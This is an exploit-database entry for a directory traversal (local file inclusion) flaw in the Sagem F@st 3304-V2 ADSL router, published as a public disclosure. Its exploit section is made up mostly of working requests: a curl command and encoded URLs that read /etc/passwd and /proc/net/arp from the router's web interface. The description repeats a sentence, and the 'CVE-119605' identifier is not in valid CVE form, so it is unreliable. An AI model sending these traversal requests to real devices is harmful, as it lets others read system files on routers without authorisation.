ID

VAR-E-201503-0451

EDB ID

36241

TITLE

Sagem F@st 3304-V2 - Local File Inclusion - Hardware webapps Exploit

DESCRIPTION

Sagem F@st 3304-V2 - Local File Inclusion. CVE-119605 . webapps exploit for Hardware platform

AFFECTED PRODUCTS

EXPLOIT

# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date : 2015-03-01
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603

# Vulnerability description:
Sagem Fast is an ADSL Router using a web management interface in order to change configuration
settings. The router is Sagem Fast is an ADSL Router using a web management interface in order
to change configuration settings.
The web server of the router is vulnerable to directory traversal which allows reading files
by sending encoded '../' requests.

The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp

EXPLOIT LANGUAGE

txt

PRICE

free

TYPE

Local File Inclusion

CREDITS

Loudiyi Mohamed

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:24:36.728000+00:00

SOURCES RELEASE DATE